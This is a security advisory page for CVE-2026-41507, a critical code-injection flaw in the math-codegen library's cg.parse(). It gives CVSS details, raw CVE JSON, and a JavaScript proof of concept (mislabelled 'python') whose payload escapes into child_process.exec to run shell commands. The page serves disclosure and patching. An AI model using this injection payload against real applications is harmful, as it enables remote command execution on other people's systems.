Security Vulnerability Report
中文
CVE-2026-41507 CVSS 9.8 CRITICAL

CVE-2026-41507

Published: 2026-05-08 14:16:34
Last Modified: 2026-05-08 16:02:14
Source: [email protected]

Description

math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

math-codegen < 0.4.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-41507 // Demonstrates arbitrary code execution via unsanitized input in cg.parse() // Usage: node poc.js const cg = require('math-codegen'); // Vulnerable version < 0.4.3 // The vulnerability allows injecting arbitrary code into the new Function() body. // By breaking out of the expected mathematical expression context, // we can execute Node.js child processes. // Payload example: Execute 'id' command on Linux/Mac or 'whoami' on Windows // The input is treated as a string literal inside the generated function. // We close the string/operation and inject a malicious statement. var maliciousPayload = "1); process.mainModule.require('child_process').exec('echo VULNERABLE > pwned.txt'); //"; console.log("[*] Attempting to exploit CVE-2026-41507..."); try { // The vulnerable library passes the payload directly to new Function() // resulting in execution similar to: new Function('return ' + payload)() var result = cg.parse(maliciousPayload); console.log("[+] Payload sent to cg.parse(). Check if file 'pwned.txt' was created."); } catch (e) { console.log("[-] Error during execution (may be due to syntax or environment):", e.message); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41507", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:34.133", "lastModified": "2026-05-08T16:02:14.343", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "references": [{"url": "https://github.com/mauriciopoppe/math-codegen/commit/4bb52d3030683362b3559ee8dd91350555a05f6b", "source": "[email protected]"}, {"url": "https://github.com/mauriciopoppe/math-codegen/pull/11", "source": "[email protected]"}, {"url": "https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.